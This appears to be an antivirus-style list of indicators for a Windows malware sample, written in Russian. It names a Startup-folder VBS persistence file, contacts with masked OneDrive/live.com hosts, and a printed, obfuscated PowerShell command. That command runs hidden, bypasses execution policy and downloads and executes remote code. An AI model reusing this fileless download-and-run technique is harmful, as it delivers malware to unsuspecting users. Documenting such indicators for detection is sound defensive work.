Техническая информация
- %APPDATA%\microsoft\windows\start menu\programs\startup\shvhost.vbs
- 'on####ve.live.com':443
- 'lo###.live.com':443
- DNS ASK on####ve.live.com
- DNS ASK lo###.live.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedriv...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExEcUtIoNPoLiCy ByPAsS -wInDoWStYlE hIdDEn -noexit -command &('I'+'EX')(New-Object Net.WebClient).(-join [char[]](68,111,119,110,108,111,97,100,83,116,114,105,110,103)).Invoke('https://onedriv...